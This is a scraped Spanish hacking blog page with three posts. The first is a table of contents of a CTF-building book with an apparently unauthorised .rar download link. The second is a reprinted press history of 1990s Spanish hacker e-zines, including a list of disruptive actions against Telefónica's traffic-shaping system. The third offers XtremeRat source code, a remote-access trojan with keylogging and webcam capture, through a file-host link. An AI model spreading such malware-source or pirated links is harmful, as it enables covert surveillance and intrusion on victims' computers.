Scenario 1 – warming Adobe ColdFusion 11
Setup 11
Variations 14
Scenario 2 – making a mess with MSSQL 15
Setup 15
Variations 19
Scenario 3 – trivializing TFTP 20
Vulnerabilities 21
Flag placement and design 22
Testing your flags 22
Making the flag too easy 23
Making your finding too hard 24
Alternate ideas 24
Post exploitation and pivoting 25
Exploitation guides 26
Scenario 1 – traverse the directories like it ain't no thing 26
Scenario 2 – your database is bad and you should feel bad 29
Scenario 3 – TFTP is holier than the Pope 33
Challenge modes 34
Summary 35
Table of Contents
[ ii ]
Chapter 2: Linux Environments 37
Differences between Linux and Microsoft 38
Setup 38
Scenario 1 – learn Samba and other dance forms 38
Setup 39
Configuration 40
Testing 41
Variations 42
Information disclosure 42
File upload 42
Scenario 2 – turning on a LAMP 42
Setup 43
The PHP 43
Variations 45
Out-of-date versions 45
Login bypass 45
SQL injection 46
Dangerous PHP 46
PHPMyAdmin 47
Scenario 3 – destructible distros 47
Setup 47
Variations 48
Scenario 4 – tearing it up with Telnet 48
Setup 49
Variations 50
Default credentials 50
Buffer overflows 51
Flag placement and design 51
Exploitation guides 51
Scenario 1 – smashing Samba 51
Scenario 2 – exploiting XAMPP 53
Scenario 3 – liking a privilege 57
Scenario 4 – tampering with Telnet 57
Summary 59
Chapter 3: Wireless and Mobile 61
Wireless environment setup 62
Software 62
Hardware 63
Scenario 1 – WEP, that's me done for the day 64
Code setup 64
Network setup 67
Table of Contents
[ iii ]
Scenario 2 – WPA-2 69
Setup 69
Scenario 3 – pick up the phone 71
Setup 71
Important things to remember 72
Exploitation guides 72
Scenario 1 – rescue the WEP key 72
Scenario 2 – potentiating partial passwords 73
Scenario 3.1 – be a geodude with geotagging 74
Scenario 3.2 – ghost in the machine or man in the middle 76
Scenario 3.3 – DNS spoof your friends for fun and profit 78
Summary 80
Chapter 4: Social Engineering 81
Scenario 1 – maxss your haxss 82
Code setup 82
Scenario 2 – social engineering: do no evil 86
Setup 86
Variations 87
Scenario 3 – hunting rabbits 88
Core principles 88
Potential avenues 90
Connecting methods 91
Creating an OSINT target 93
Scenario 4 – I am a Stegosaurus 94
Visual steganography 94
Exploitation guides 96
Scenario 1 – cookie theft for fun and profit 96
Scenario 2 – social engineering tips 97
Scenario 3 – exploitation guide 98
Scenario 4 – exploitation guide 100
Summary 101
Chapter 5: Cryptographic Projects 103
Crypto jargon 104
Scenario 1 – encode-ageddon 104
Generic encoding types 104
Random encoding types 105
Scenario 2 – encode + Python = merry hell 106
Setup 106
Substitution cipher variations 107
Table of Contents
[ iv ]
Scenario 3 – RC4, my god, what are you doing? 108
Setup 108
Implementations 110
Scenario 4 – Hishashin 111
Setup 111
Hashing variations 112
Scenario 5 – because Heartbleed didn't get enough publicity as it is 113
Setup 113
Variations 116
Exploitation guides 117
Scenario 1 – decode-alypse now 117
Scenario 2 – trans subs and other things that look awkward in
your history 118
Automatic methods 119
Scenario 3 – was that a 1 or a 0 or a 1? 119
Scenario 4 – hash outside of Colorado 120
Scenario 5 – bleeding hearts 122
Summary 123
Chapter 6: Red Teaming 125
Chapter guide 125
Scoring systems 126
Setting scenarios 127
Reporting 128
Reporting example 129
Reporting explanation 130
CTF-style variations 131
DEFCON game 131
Physical components 131
Attack and defense 132
Jeopardy 133
Scenario 1 – ladders, why did it have to be ladders? 133
Network diagram 134
Brief 135
Setting up virtual machines 136
DMZ 138
missileman 140
secret1 142
secret2 143
secret3 145
Attack guide 147
Variations 153
Table of Contents
[ v ]
Dummy devices 153
Combined OSINT trail 153
The missile base scenario summary 154
Scenario 2 – that's no network, it's a space station 154
Network diagram 154
Brief 156
Setting up a basic network 156
Attack of the clones 157
Customizing cloned VMs 158
Workstation1 158
Workstation2 159
Workstation3 159
Workstation4 159
Workstation5 160
Attack guide 160
Variations 161
The network base scenario summary 162
Summary 162
Appendix 163
Further reading 163
Recommended competitions 165
Existing vulnerable VMs 165
Index

Descargar:

http://www.mediafire.com/download/jiymbiych5dk8k5/Kali_Linux_CTF_Blueprints.rar

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (II)


Todo 'hacker' lleva encima una mochila hecha de cientos, miles de horas de estudio y lectura. Los libros son sus aliados, gruesos libros técnicos donde destaca, desde el principio, la editorial O'Reilly. Pero el mundo de la tecnología cambia tan rápido que el libro solo no puede alcanzarlo: ¿Cómo esperar a que se publique un libro para avisar de un agujero de seguridad, o de la aparición de una nueva versión de un programa? Aquí juegan un papel clave los foros y medios en línea, sean medios de comunicación al uso, blogs, redes sociales, páginas web o las hoy prácticamente desaparecidas 'e-zines' (de 'electronic magazine'), las revistas donde los 'hackers', solos o en grupo, difunden su conocimiento al resto.



La mayoría de 'ezines hacker' españolas aparecieron en la segunda mitad de los 90. La primera de la que se tenga constancia fue "Virtual Zone Magazine". Nació en enero de 1996 y duró cinco números, hasta mayo de 1997. Se hacía desde Granada y su editor era Legion. Versaba sobre temas de interés para programadores, como virus, demos y videojuegos.

1996 sería el año del 'boom' de las primeras 'ezines hacker' españolas, coincidiendo con la aparición de los primeros grupos y el inicio de la construcción de la comunidad. La mayoría no duraron más de 3 números, como 'The Young Hacker of Spain', 'WEB-HACK Magazine', 'CyberHACK' o 'HACK Navigator'. Esta última sólo sacó un número, pero entre sus autores estaban algunos de los apodos punteros de la escena hacker de aquellos años: Warezzman, Homs oGuybrush. Los hackers latinoamericanos les llevaban un año de delantera con 'Minotauro', 'PSYCHO Magazine' o 'YOUTHANASIA'.

Las 'ezines' solían ser archivos de texto plano o, menos, PDF, a veces acompañados del código de algún virus con fines educacionales, todo comprimido en formato '.zip' o '.tar.gz.'. Cuando la compresión se alejaba del típico '.zip' que usaban el común de los usuarios del sistema operativo Windows, se añadía una nueva barrera a quien quería acceder a estos textos, pues además de tener que descubrir dónde estaba la BBS o página web del grupo que publicaba la 'ezine', para poderla descargar, debía también tener los programas adecuados para "desempaquetarla". Estas 'ezines' tenían una periodicidad irregular, más cuanto más tiempo llevaban editándose pues la gente que las publicaba se cansaba o los grupos entraban en decadencia.

El contenido eran básicamente textos técnicos de seguridad informática, programación, telecomunicaciones, fuesen traducciones, investigaciones propias y a veces copias de artículos de otras revistas, lo que era denostado por la comunidad 'hacker', que tiene en su jerga una palabra, 'lamer', para quien sólo copia sin aportar, adjudicándose y aprovechándose del trabajo de otros. En las primeras 'ezines' abundaban además los textos de talante destructivo o ilegal: cómo hacer bombas reales o virtuales, cómo abrir candados, beber gratis en una discoteca o robar dinero de un cajero automático. Y siempre había sitio para textos de humor.

Un ejemplo del contenido de una 'ezine hacker' ya más evolucionada sería este, del número 10 de 'Saqueadores Edición Técnica':






La 'ezine' 'Saqueadores' nació el 6 de octubre de 1996 y es la más longeva de la escena hacker hispana, con 38 números hasta la fecha, pues aunque lleva en letargo desde 2009 aún no ha echado oficialmente el cierre. Algunos la llaman la 'Phrack' española (la revista norteamericana 'Phrack' es la más respetada y longeva sobre hacking en lengua inglesa). No en vano pues llegó a tener gran influencia, no sólo la revista sino también las personas que congregó a su alrededor, artífices de buena parte de los proyectos de la escena 'hacker' de los 90 e instigadores del nacimiento y consolidación de la comunidad.

Empezó llamándose 'Saqueadores', después 'Saqueadores Edición Técnica' y finalmente se quedó en 'SET'. Inicialmente y como muchas otras 'ezines' se distribuía a través de una BBS, la BBS Club de Murcia. Los tres primeros números tenían un solo autor: Eljacker, a quien acompañaban Warezzman y Dark Raver. Pronto aparecieron más colaboradores, siendo los apodos más destacados El Duke de Sicilia, +Ochodedos, SLink, RoN, RedCool, Profesor Falken, Paseante, +NetBuL, Garrulon, Madfran, Green Legend, Rufus, Episiarca, Hendrix, FCA00000, Blackngel, Thenemi y Elotro.

Cuando la revista cumplió un año, en octubre de 1997, lo celebraron montando el primer congreso semi-público de 'hackers' del que se tiene noticia en España: la Undercon, un evento 'underground' al que sólo se accedía por invitación. La Undercon se celebró anualmente hasta 2004 y fue un importante catalizador de la comunidad hacker, que se reunía una vez al año en Murcia para escuchar charlas sobre temas tan punteros en plenos 90 como 'hacking' en satélites, o tan útiles como el pinchado de cabinas telefónicas.

El Profesor Falken y Paseante lideraron la revista en su momento de mayor esplendor, con impactantes artículos como cuando Paseante explica que se ha "paseado" por los servidores de Infovía (Archivo ZIP). La red Infovía de Telefónica era en los 90 el paso obligado de prácticamente todos los internautas para entrar a Internet. Decenas de proveedores de acceso nacieron a la sombra de Infovía, que permitía navegar, mandar correo o chatear a precio de llamada local. Paseante descubrió cómo tomar el control de esta red, lo que tuvo gran repercusión más allá del 'underground'. Los rumores aseguraban que Telefónica mandó gente a la Undercon para recabar más datos sobre esta intrusión.

Paseante explicó así su hazaña: "Me gustaria que quedase claro que debido a la situación española el control de Infovia posibilita el dominio cuasi-total del trafico Internet de nuestro país, eso no es solo un atractivo innegable para un 'hacker' sino también UNA RESPONSABILIDAD, no soy partidario de aquellos que en nombre de la 'libertad' se dedican a desestabilizar sistemas ya que en definitiva nos acaba perjudicando por la perdida de servicios y la 'leyenda negra' que se crea, ese es uno de los motivos por los que aquí damos pistas, indicios pero no todo masticado. El que quiera que se lo curre y por el camino confío que adquiera el sentido común necesario para ser capaz de no hundir sistemas de los que dependen centenares de miles de personas".

Una de las últimas acciones sonadas del grupo, que relata su 'ezine', se sitúa en noviembre de 1999, cuando entraron en el 'PacketShaper' de Telefónica, un sistema de control del tráfico de las redes de importantes empresas e instituciones españolas, comoAlcampo, Caja Madrid, El País, ABC, Instituto Cervantes, Telefónica, Banco Bilbao Vizcaya, Nestlé, Infonegocio, Agencia Estatal de Administración Tributaria, el Congreso de los Diputados, Iberia, Citroën y otros. Así contaba Paseante qué podrían haber hecho, pero por ética no hicieron:
Poner todo el trafico de Iberia a un _maximo_ de 1kb/s: Moraleja: Si va a volar con Iberia, vaya acostumbrandose a esperar.
Crear una nueva clase de trafico en Correo_Telefonica para todos los mensajes a Villalonga (tendra el correo ahi digo yo) y eliminarlos sin avisar :-O
Vigilar todo el trafico que genera el servidor del Congreso a ver si se esta haciendo buen uso de el Guipar todas las sesiones Telnet y FTP (da mucho juego)
Número 1: Aplicar un Redirect URL a la web de Telefonica.



¿Qué se esperaría de un 'piligroso delicuente hinfosmatico'?


Bloquear todo el trafico a El_Pais y el ABC
Resetear el PS, desconfigurarlo, cargar una nueva imagen del SO troyanizada.
Dejar a todos los usuarios de Teleline sin servicio.
Darle un Discard a Backbone_Salida, veras tu como nos reiamos.
Pegar un Never Admit masivo y cargarme tanto trafico que la quejas iban a llegar hasta la ONU.

"Lo podía haber hecho por supuesto, poner el shaping a on y crear una serie de politicas Never-Admit, Redirect URL, hacer un Discard salvaje... Podía haber hecho con el PS lo que quisiera, era completamente mío."
Fuente:elmundo.es

XtremeRat Limpio C#





Cita:
RAT’s: aplicaciones de administración remota .Tienen varias funciones como keylogger, capturador de cam, etc. Su función básica es administrar remotamente un ordenador desde otro y poder ejecutar distintas acciones que trae consigo.

Por esto esta Sucio :( 

http://www.rpp.com.pe/2014-01-27-piratas-informaticos-atacan-el-ministerio-de-defensa-de-israel-noticia_664887.html

http://www.v3.co.uk/v3-uk/news/2329614/hackers-dropping-zeus-in-favour-of-xtreme-rat

http://www.eset.com.uy/threat-center/index.php?subaction=showfull&id=1354747280&archive=&start_from=&ucat=2&n=2





Descargar Code:

http://www.mediafire.com/download/vzanwvc1zfwwf1x/CodesBy+hallaj.zip


Creditos Hallaj
Thanks F-I-G-H-T-E-R /Codes.